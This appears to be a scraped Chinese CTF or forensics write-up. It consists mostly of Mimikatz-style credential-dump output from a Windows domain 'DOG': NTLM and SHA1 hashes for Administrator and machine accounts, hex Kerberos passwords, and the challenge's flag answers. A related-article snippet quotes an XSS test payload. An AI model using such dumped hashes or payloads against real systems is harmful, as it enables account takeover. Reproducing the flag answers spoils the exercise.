SID               : S-1-5-90-1msv :[00000003] Primary* Username : WIN-MVNE1SFJ0LQ$* Domain   : DOG* NTLM     : 5f82695a422af9105af8c29caa8406e6* SHA1     : 21fa78c558159124c9f55b1ab891d0426f2ee246tspkg :wdigest :* Username : WIN-MVNE1SFJ0LQ$* Domain   : DOG* Password : (null)kerberos :* Username : WIN-MVNE1SFJ0LQ$* Domain   : dog.local* Password : 27 2d 17 f2 4b 16 db a8 ef d4 82 a5 49 dc f3 35 3e a8 d8 ad 08 73 fd 21 01 f5 2d b0 95 ec b2 5f 76 c1 ec e6 98 3f 41 54 af 9c 59 6c 6e 01 06 d3 b0 79 dc 42 c4 7f 3d a5 f3 61 ef fa 33 74 50 8c 84 9f 05 14 45 86 c0 4f 2f c6 8b 30 4f 4b 37 b4 ad 8d db ae eb 44 5d e4 39 e7 c3 be 6d f6 37 2e 41 ad 3f 35 3d a6 b8 1c e9 91 e6 f3 60 9d 21 c4 f8 9e 5f 0f 24 95 38 90 6b da 27 c0 2d 86 3a 5d 58 19 56 7f ad 68 3f 6e 4a de e2 fd 02 bd 0b af 06 3b 73 47 26 ab ce ba 72 96 ce 8f 21 1d 42 34 9a 5f 87 79 d5 20 07 63 b5 a9 ad 59 4d 96 6f 7f c8 d8 8f cd 0d 56 72 96 45 58 ad 55 66 f5 a4 6c 05 49 5b b2 fb e8 eb 5a 36 f2 9d 69 1f 69 fb b7 6f 19 43 01 43 c9 96 c4 18 73 24 52 ff 1c 15 62 3d 79 f3 6c 75 2e 38 28 07 5f 7f e0 e1 62 05 a0 ssp :   KOcredman :Authentication Id : 0 ; 996 (00000000:000003e4)
Session           : Service from 0
User Name         : WIN-MVNE1SFJ0LQ$
Domain            : DOG
Logon Server      : (null)
Logon Time        : 2024/4/3 7:15:00
SID               : S-1-5-20msv :[00000003] Primary* Username : WIN-MVNE1SFJ0LQ$* Domain   : DOG* NTLM     : 94901a951ee2d32e070982b4276eebd6* SHA1     : e5cb7373614ebcf623c1d23f74e8fe909ef3fbb3tspkg :wdigest :* Username : WIN-MVNE1SFJ0LQ$* Domain   : DOG* Password : (null)kerberos :* Username : win-mvne1sfj0lq$* Domain   : DOG.LOCAL* Password : (null)ssp :   KOcredman :Authentication Id : 0 ; 27364 (00000000:00006ae4)
Session           : UndefinedLogonType from 0
User Name         : (null)
Domain            : (null)
Logon Server      : (null)
Logon Time        : 2024/4/3 7:12:58
SID               : msv :[00000003] Primary* Username : WIN-MVNE1SFJ0LQ$* Domain   : DOG* NTLM     : 94901a951ee2d32e070982b4276eebd6* SHA1     : e5cb7373614ebcf623c1d23f74e8fe909ef3fbb3tspkg :wdigest :kerberos :ssp :   KOcredman :Authentication Id : 0 ; 40540109 (00000000:026a97cd)
Session           : Interactive from 2
User Name         : DWM-2
Domain            : Window Manager
Logon Server      : (null)
Logon Time        : 2024/4/11 11:49:36
SID               : S-1-5-90-2msv :[00000003] Primary* Username : WIN-MVNE1SFJ0LQ$* Domain   : DOG* NTLM     : 94901a951ee2d32e070982b4276eebd6* SHA1     : e5cb7373614ebcf623c1d23f74e8fe909ef3fbb3tspkg :wdigest :* Username : WIN-MVNE1SFJ0LQ$* Domain   : DOG* Password : (null)kerberos :* Username : WIN-MVNE1SFJ0LQ$* Domain   : dog.local* Password : 3d a8 bc 4c cd ed 97 02 2b 9c b1 14 85 2a 37 05 22 a2 b9 07 3a 88 4e 4e 42 60 45 c2 6c 18 f1 36 1d 58 dd 69 e6 9c f5 e8 2f 4a 07 0e b2 3b 58 07 46 4d 6a 0e e3 48 10 54 ce eb 2c 77 5e 51 e1 8f e5 1a 63 8b b7 2c cb f5 08 46 2a 03 27 99 13 66 7c 7d 9b ed 48 36 0d 42 89 43 56 14 c7 b1 44 dc d0 82 ce ae 59 64 ac 8d 16 82 07 da 18 e5 1e cd e7 1c f8 b1 bb b8 65 7a d7 91 3e 59 8b 9b 0b 45 bd 30 b0 90 48 e0 e6 31 e1 85 1d 70 eb 16 0a f7 b2 dd 13 2c fc 3d d7 0a f7 70 43 13 04 4b 79 0d 44 60 28 13 dd cb 3e ae 89 9c f1 42 fb 11 54 65 9a be 2a 10 82 57 e9 d9 a8 ef 4d 2a e9 85 01 36 f8 3d 8d 66 9b 6b 58 ef 86 54 34 2b 9e 6c e9 4d c0 a7 ec 85 e7 b1 4e 54 91 af e6 d4 d9 8e 08 e9 78 ff f9 d0 45 b2 b7 14 40 2c 8a a9 a9 62 21 d2 ssp :   KOcredman :Authentication Id : 0 ; 480371 (00000000:00075473)
Session           : Interactive from 1
User Name         : Administrator
Domain            : DOG
Logon Server      : WIN-MVNE1SFJ0LQ
Logon Time        : 2024/4/3 7:29:29
SID               : S-1-5-21-2515766443-2959740750-3575737072-500msv :[00000003] Primary* Username : Administrator* Domain   : DOG* NTLM     : e054e61488f2545292d4e5b9f722d9a2* SHA1     : 6aec174b0d46521c233a254120538a6bddecc0c7[00010000] CredentialKeys* NTLM     : e054e61488f2545292d4e5b9f722d9a2* SHA1     : 6aec174b0d46521c233a254120538a6bddecc0c7[00010000] CredentialKeys* NTLM     : 32ed87bdb5fdc5e9cba88547376818d4* SHA1     : 6ed5833cf35286ebf8662b7b5949f0d742bbec3ftspkg :wdigest :* Username : Administrator* Domain   : DOG* Password : (null)kerberos :* Username : Administrator* Domain   : DOG.LOCAL* Password : (null)ssp :   KOcredman :Authentication Id : 0 ; 997 (00000000:000003e5)
Session           : Service from 0
User Name         : LOCAL SERVICE
Domain            : NT AUTHORITY
Logon Server      : (null)
Logon Time        : 2024/4/3 7:15:16
SID               : S-1-5-19msv :tspkg :wdigest :* Username : (null)* Domain   : (null)* Password : (null)kerberos :* Username : (null)* Domain   : (null)* Password : (null)ssp :   KOcredman :Authentication Id : 0 ; 55865 (00000000:0000da39)
Session           : Interactive from 1
User Name         : DWM-1
Domain            : Window Manager
Logon Server      : (null)
Logon Time        : 2024/4/3 7:15:11
SID               : S-1-5-90-1msv :[00000003] Primary* Username : WIN-MVNE1SFJ0LQ$* Domain   : DOG* NTLM     : 94901a951ee2d32e070982b4276eebd6* SHA1     : e5cb7373614ebcf623c1d23f74e8fe909ef3fbb3tspkg :wdigest :* Username : WIN-MVNE1SFJ0LQ$* Domain   : DOG* Password : (null)kerberos :* Username : WIN-MVNE1SFJ0LQ$* Domain   : dog.local* Password : 3d a8 bc 4c cd ed 97 02 2b 9c b1 14 85 2a 37 05 22 a2 b9 07 3a 88 4e 4e 42 60 45 c2 6c 18 f1 36 1d 58 dd 69 e6 9c f5 e8 2f 4a 07 0e b2 3b 58 07 46 4d 6a 0e e3 48 10 54 ce eb 2c 77 5e 51 e1 8f e5 1a 63 8b b7 2c cb f5 08 46 2a 03 27 99 13 66 7c 7d 9b ed 48 36 0d 42 89 43 56 14 c7 b1 44 dc d0 82 ce ae 59 64 ac 8d 16 82 07 da 18 e5 1e cd e7 1c f8 b1 bb b8 65 7a d7 91 3e 59 8b 9b 0b 45 bd 30 b0 90 48 e0 e6 31 e1 85 1d 70 eb 16 0a f7 b2 dd 13 2c fc 3d d7 0a f7 70 43 13 04 4b 79 0d 44 60 28 13 dd cb 3e ae 89 9c f1 42 fb 11 54 65 9a be 2a 10 82 57 e9 d9 a8 ef 4d 2a e9 85 01 36 f8 3d 8d 66 9b 6b 58 ef 86 54 34 2b 9e 6c e9 4d c0 a7 ec 85 e7 b1 4e 54 91 af e6 d4 d9 8e 08 e9 78 ff f9 d0 45 b2 b7 14 40 2c 8a a9 a9 62 21 d2 ssp :   KOcredman :Authentication Id : 0 ; 999 (00000000:000003e7)
Session           : UndefinedLogonType from 0
User Name         : WIN-MVNE1SFJ0LQ$
Domain            : DOG
Logon Server      : (null)
Logon Time        : 2024/4/3 7:12:52
SID               : S-1-5-18msv :tspkg :wdigest :* Username : WIN-MVNE1SFJ0LQ$* Domain   : DOG* Password : (null)kerberos :* Username : win-mvne1sfj0lq$* Domain   : DOG.LOCAL* Password : (null)ssp :   KOcredman :

全部的sessions

32

flag1

0E089DC1595C3447DD62519756BCC4AC20C807D116065A385200E1A06D5F827486C5C25DCEC68876B07B8B31E416996122DAA05E280DD998396F6EF573A9D40F

flag2

E6B8C928198A4F27CAF809AE6AD48F9A7E56F7CC0632726C4A444DEF3D8C6E76A9918065141F2288DF7A0E790F2B1F4B783C99C7CFF29F0DD7F384CD6014B59F

flag3?

3da8bc4ccded97022b9cb114852a370522a2b9073a884e4e426045c26c18f1361d58dd69e69cf5e82f4a070eb23b5807464d6a0ee3481054ceeb2c775e51e18fe51a638bb72ccbf508462a03279913667c7d9bed48360d4289435614c7b144dcd082ceae5964ac8d168207da18e51ecde71cf8b1bbb8657ad7913e598b9b0b45bd30b09048e0e631e1851d70eb160af7b2dd132cfc3dd70af7704313044b790d44602813ddcb3eae899cf142fb1154659abe2a108257e9d9a8ef4d2ae9850136f83d8d669b6b58ef8654342b9e6ce94dc0a7ec85e7b14e5491afe6d4d98e08e978fff9d045b2b714402c8aa9a96221d2

nType from 0
User Name : WIN-MVNE1SFJ0LQ$
Domain : DOG
Logon Server : (null)
Logon Time : 2024/4/3 7:12:52
SID : S-1-5-18
msv :
tspkg :
wdigest :
* Username : WIN-MVNE1SFJ0LQ$
* Domain : DOG
* Password : (null)
kerberos :
* Username : win-mvne1sfj0lq$
* Domain : DOG.LOCAL
* Password : (null)
ssp : KO
credman :


全部的sessions[外链图片转存中...(img-AN9KgVtz-1727602850327)]flag1

0E089DC1595C3447DD62519756BCC4AC20C807D116065A385200E1A06D5F827486C5C25DCEC68876B07B8B31E416996122DAA05E280DD998396F6EF573A9D40F


flag2

E6B8C928198A4F27CAF809AE6AD48F9A7E56F7CC0632726C4A444DEF3D8C6E76A9918065141F2288DF7A0E790F2B1F4B783C99C7CFF29F0DD7F384CD6014B59F


flag3?

3da8bc4ccded97022b9cb114852a370522a2b9073a884e4e426045c26c18f1361d58dd69e69cf5e82f4a070eb23b5807464d6a0ee3481054ceeb2c775e51e18fe51a638bb72ccbf508462a03279913667c7d9bed48360d4289435614c7b144dcd082ceae5964ac8d168207da18e51ecde71cf8b1bbb8657ad7913e598b9b0b45bd30b09048e0e631e1851d70eb160af7b2dd132cfc3dd70af7704313044b790d44602813ddcb3eae899cf142fb1154659abe2a108257e9d9a8ef4d2ae9850136f83d8d669b6b58ef8654342b9e6ce94dc0a7ec85e7b14e5491afe6d4d98e08e978fff9d045b2b714402c8aa9a96221d2

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.rhkb.cn/news/439038.html

如若内容造成侵权/违法违规/事实不符,请联系长河编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

算法笔记(九)——栈

文章目录 删除字符串中的所有相邻重复项比较含退格的字符串基本计算机II字符串解码验证栈序列 栈是一种先进后出的数据结构&#xff0c;其操作主要有 进栈、压栈&#xff08;Push&#xff09; 出栈&#xff08;Pop&#xff09; 常见的使用栈的算法题 中缀转后缀逆波兰表达式求…

大学生就业市场:Spring Boot招聘系统的设计与实现

4系统概要设计 4.1概述 本系统采用B/S结构(Browser/Server,浏览器/服务器结构)和基于Web服务两种模式&#xff0c;是一个适用于Internet环境下的模型结构。只要用户能连上Internet,便可以在任何时间、任何地点使用。系统工作原理图如图4-1所示&#xff1a; 图4-1系统工作原理…

MySQL中NULL值是否会影响索引的使用

MySQL中NULL值是否会影响索引的使用 为何写这一篇文章 &#x1f42d;&#x1f42d;在面试的时候被问到NULL值是否会走索引的时候&#xff0c;感到有点不理解&#xff0c;于是事后就有了这篇文章 问题&#xff1a; 为name建立索引&#xff0c;name可以为空select * from user …

OpenHarmony标准系统上实现对rk系列芯片NPU的支持(npu使用)

在上篇文章中&#xff0c;我们学习了移植rk的npu驱动到OpenHarmony提供的内核。本文我们来学习如何在OpenHarmony标准系统rk系列芯片如何使用npu OpenHarmony RK系列芯片运行npu测试用例 在移植npu驱动到OpenHarmony之后&#xff0c;来运行npu样例进行简单测试 1.O 测试准备…

ModuleNotFoundError: No module named ‘package‘

报错&#xff1a; Traceback (most recent call last): File “”, line 198, in run_module_as_main File “”, line 88, in run_code File "D:\python\helloworld.venv\Scripts\pip.exe_main.py", line 4, in File "D:\python\helloworld.venv\Lib\site-pac…

昇思学习打卡营第32天|基于ResNet50的中药炮制饮片质量判断模型

背景介绍 中药炮制是根据中医药理论&#xff0c;依照临床用药需求&#xff0c;通过调剂和制剂要求&#xff0c;将中药材制备成中药饮片的过程。老百姓日常使用的中药饮片&#xff0c;是中药炮制技术的成果。中药炮制过程中&#xff0c;尤其是涉及到水火处理时&#xff0c;必须注…

电器自动化入门08:隔离变压器、行程开关介绍及选型

视频链接&#xff1a;3.4 电工知识&#xff1a;三相交流异步电动机自动往返行程控制及控制变压器选型_哔哩哔哩_bilibilihttps://www.bilibili.com/video/BV1PJ41117PW?p8&vd_sourceb5775c3a4ea16a5306db9c7c1c1486b5 1.隔离&#xff08;控制&#xff09;变压器 2.行程开…

【AI】AIOT简介

随着技术的快速发展&#xff0c;人工智能AI和物联网IoT已经成为当今最热门的技术领域。AIOT是人工智能和物联网的结合&#xff0c;使物联网设备更加智能化&#xff0c;能够进行自主决策和学习的技术。 通过物联网产生、收集来自不同维度的、海量的数据存储于云端、边缘端&#…

828华为云征文|部署个人文档管理系统 Docspell

828华为云征文&#xff5c;部署个人文档管理系统 Docspell 一、Flexus云服务器X实例介绍二、Flexus云服务器X实例配置2.1 重置密码2.2 服务器连接2.3 安全组配置2.4 Docker 环境搭建 三、Flexus云服务器X实例部署 Docspell3.1 Docspell 介绍3.2 Docspell 部署3.3 Docspell 使用…

深度学习基础—目标定位与特征点检测

1.目标定位 &#xff08;1&#xff09;定义 目标定位就是在图片中&#xff0c;定位对象的位置&#xff0c;对于对象的位置可以用框圈住显示。如下图所示&#xff1a; 假设正在进行图片分类工作&#xff0c;那么这个汽车图片很有可能被分类为汽车类别。对于目标定位&#xff0c;…

螺蛳壳里做道场:老破机搭建的私人数据中心---Centos下Docker学习01(环境准备)

1 准备工作 由于创建数据中心需要安装很多服务器&#xff0c;这些服务器要耗费很所物理物理计算资源、存储资源、网络资源和软件资源&#xff0c;作为穷学生只有几百块的n手笔记本&#xff0c;不可能买十几台服务器来搭建数据中心&#xff0c;也不愿意跑实验室&#xff0c;想躺…

Pikachu-Cross-Site Scripting-xss之htmlspecialchars

首先输入各种字符 查看页面元素&#xff0c;可以看到这里对一些符号做了转换&#xff0c;但是 单引号等几个符号没处理&#xff1b; 从代码上看&#xff1b;使用单引号做闭合&#xff1b; 构造payload a onclickalert(11) 提交&#xff0c;得到xss攻击

网约班车升级手机端退票

背景 作为老古董程序员&#xff0c;不&#xff0c;应该叫互联网人员&#xff0c;因为我现在做的所有的事情&#xff0c;都是处于爱好&#xff0c;更多的时间是在和各行各业的朋友聊市场&#xff0c;聊需求&#xff0c;聊怎么通过IT互联网 改变实体行业的现状&#xff0c;准确的…

【Qt】控件概述(2)—— 按钮类控件

控件概述&#xff08;2&#xff09; 1. PushButton2. RadioButton——单选按钮2.1 使用2.2 区分信号 clicked&#xff0c;clicked(bool)&#xff0c;pressed&#xff0c;released&#xff0c;toggled(bool)2.3 QButtonGroup分组 3. CheckBox——复选按钮 1. PushButton QPushB…

《15分钟轻松学 Python》教程目录

为什么要写这个教程呢&#xff0c;主要是因为即使是AI技术突起的时代&#xff0c;想要用好AI做开发&#xff0c;那肯定离不开Python&#xff0c;就算最轻量级的智能体都有代码块要写&#xff0c;所以不一定要掌握完完整整的Python&#xff0c;只要掌握基础就能应对大部分场景。…

【机器学习】ID3、C4.5、CART 算法

目录 常见的决策树算法 1. ID3 2. C4.5 3. CART 决策树的优缺点 优点&#xff1a; 缺点&#xff1a; 决策树的优化 常见的决策树算法 1. ID3 ID3&#xff08;Iterative Dichotomiser 3&#xff09;算法使用信息增益作为特征选择的标准。它是一种贪心算法&#xff0c;信…

【D3.js in Action 3 精译_027】3.4 让 D3 数据适应屏幕(下)—— D3 分段比例尺的用法

当前内容所在位置&#xff08;可进入专栏查看其他译好的章节内容&#xff09; 第一部分 D3.js 基础知识 第一章 D3.js 简介&#xff08;已完结&#xff09; 1.1 何为 D3.js&#xff1f;1.2 D3 生态系统——入门须知1.3 数据可视化最佳实践&#xff08;上&#xff09;1.3 数据可…

python实现单例模式的常用三种方法-基于__new__/使用装饰器以及Python中的值类型、引用类型以及类的静态变量、读取进程和线程ID

一、python实现单例模式的常用三种方法-基于__new__,使用装饰器 涉及到类的使用就会有类的实例化&#xff0c;就会有类单例实现的需求&#xff0c;因为重复实例化会浪费资源。python中的单例模式与别的语言相比&#xff0c;单例实现的方法更丰富。虽然python实现单例的模式的方…

一文掌握Harbor镜像同步公有云镜像仓库实践

一文掌握Harbor镜像同步公有云镜像仓库实践 目录 1 引言2 概念 2.1 Harbor2.2 阿里云的镜像仓库ACR2.3 华为云的镜像仓库SWR2.4 Harbor复制管理同步镜像 2.4.1 复制管理的工作原理 2.5 Harbor同步镜像到公有云镜像仓库的优势 3 实验&#xff1a;通过Harbor 将容器镜像同步到公…

win7怎么禁用驱动强制数字签名?win7驱动程序强制数字签名禁用方法

在Windows 7 64位操作系统中&#xff0c;安装驱动程序时可能会遇到“数字签名”的问题&#xff0c;这是微软为了确保驱动程序的安全性和可靠性而引入的一项安全机制。本文将深入探讨这个问题&#xff0c;并提供有效的解决方案。 理解数字签名的概念是至关重要的。数字签名是一…